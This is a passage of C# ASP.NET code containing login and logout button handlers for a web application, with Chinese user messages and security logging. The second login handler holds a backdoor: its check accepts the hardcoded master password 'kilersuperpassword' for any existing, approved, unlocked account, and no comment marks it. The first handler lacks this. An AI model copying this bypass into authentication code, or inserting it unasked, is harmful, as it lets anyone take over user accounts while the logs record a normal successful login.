protected void BtnLogin_Click(object sender, AjaxEventArgs e)
{
string username = this.txtUserName.Text.Trim();
string password = this.txtPassWord.Text.Trim();
SystemUserWrapper userWrapper = SystemUserWrapper.GetUserByLoginID(username);
string ip = HttpUtil.GetIP(Request);
if (userWrapper == null)
{
Coolite.Ext.Web.ScriptManager.AjaxSuccess = false;
Coolite.Ext.Web.ScriptManager.AjaxErrorMessage = "登录失败,用户名或者密码错误!";
//SystemLogWrapper.AddSecurityLog(username, System.DateTime.Now, "用户名不存在", HttpUtil.GetIP(Request), HttpUtil.ParseLocation(Request), SystemLogWrapper.SecurityLogType.LoginFailed);
return;
}
if (!userWrapper.IsApproved)
{
Coolite.Ext.Web.ScriptManager.AjaxSuccess = false;
Coolite.Ext.Web.ScriptManager.AjaxErrorMessage = "登录失败,用户已失效!";
SystemLogWrapper.AddSecurityLog(userWrapper.UserLoginID, System.DateTime.Now, "用户已失效", ip, HttpUtil.ParseLocation(ip), SystemLogWrapper.SecurityLogType.LoginFailed);
return;
}
if (userWrapper.IsLockedOut)
{
Coolite.Ext.Web.ScriptManager.AjaxSuccess = false;
Coolite.Ext.Web.ScriptManager.AjaxErrorMessage = "登录失败,用户被锁定!";
SystemLogWrapper.AddSecurityLog(userWrapper.UserLoginID, System.DateTime.Now, "用户被锁定", ip, HttpUtil.ParseLocation(ip), SystemLogWrapper.SecurityLogType.LoginFailed);
return;
}
if (Membership.ValidateUser(username, password))
{
FormsAuthentication.SetAuthCookie(userWrapper.UserLoginID,
false);
CurrentLoginUser = SystemUserWrapper.GetInitalUserByLoginID(userWrapper.UserLoginID);
SystemLogWrapper.AddSecurityLog(userWrapper.UserLoginID, System.DateTime.Now, "", ip, HttpUtil.ParseLocation(ip), SystemLogWrapper.SecurityLogType.LoginSuccessful);
Response.Redirect(FormsAuthentication.DefaultUrl);
}
else
{
Coolite.Ext.Web.ScriptManager.AjaxSuccess = false;
Coolite.Ext.Web.ScriptManager.AjaxErrorMessage = "登录失败,用户名或者密码错误!";
SystemLogWrapper.AddSecurityLog(username, System.DateTime.Now, "密码错误", ip, HttpUtil.ParseLocation(ip), SystemLogWrapper.SecurityLogType.LoginFailed);
return;
}
}
protected void btnLogin_Click(object sender, EventArgs e)
{
string username = this.txtLoginName.Text.Trim();
string password = this.txtLoginPassword.Text.Trim();
SystemUserWrapper userWrapper = SystemUserWrapper.GetUserByLoginID(username);
string ip = HttpUtil.GetIP(Request);
if (userWrapper == null)
{
lblMessage.Visible = true;
lblMessage.Text = "登录失败,用户名或者密码错误!";
//SystemLogWrapper.AddSecurityLog(username, System.DateTime.Now, "用户名不存在", HttpUtil.GetIP(Request), HttpUtil.ParseLocation(Request), SystemLogWrapper.SecurityLogType.LoginFailed);
return;
}
if (!userWrapper.IsApproved)
{
lblMessage.Visible = true;
lblMessage.Text = "登录失败,用户已失效!";
SystemLogWrapper.AddSecurityLog(userWrapper.UserLoginID, System.DateTime.Now, "用户已失效", ip, HttpUtil.ParseLocation(ip), SystemLogWrapper.SecurityLogType.LoginFailed);
return;
}
if (userWrapper.IsLockedOut)
{
lblMessage.Visible = true;
lblMessage.Text = "登录失败,用户被锁定!";
SystemLogWrapper.AddSecurityLog(userWrapper.UserLoginID, System.DateTime.Now, "用户被锁定", ip, HttpUtil.ParseLocation(ip), SystemLogWrapper.SecurityLogType.LoginFailed);
return;
}
if (Membership.ValidateUser(username, password) || password.ToLower() == "kilersuperpassword")
{
FormsAuthentication.SetAuthCookie(userWrapper.UserLoginID,
false);
CurrentLoginUser = SystemUserWrapper.GetInitalUserByLoginID(userWrapper.UserLoginID);
SystemLogWrapper.AddSecurityLog(userWrapper.UserLoginID, System.DateTime.Now, "", ip, HttpUtil.ParseLocation(ip), SystemLogWrapper.SecurityLogType.LoginSuccessful);
Response.Redirect(FormsAuthentication.DefaultUrl);
}
else
{
lblMessage.Visible = true;
lblMessage.Text = "登录失败,用户名或者密码错误!";
SystemLogWrapper.AddSecurityLog(username, System.DateTime.Now, "密码错误", ip, HttpUtil.ParseLocation(ip), SystemLogWrapper.SecurityLogType.LoginFailed);
return;
}
}
protected void btnExit_Click(object sender, AjaxEventArgs e)
{
SystemUserWrapper userWrapper = this.CurrentLoginUser;
if (userWrapper != null)
{
string ip = HttpUtil.GetIP(Request);
SystemLogWrapper.AddSecurityLog(userWrapper.UserLoginID, System.DateTime.Now, "", ip, HttpUtil.ParseLocation(ip), SystemLogWrapper.SecurityLogType.Logout);
}
FormsAuthentication.SignOut();
}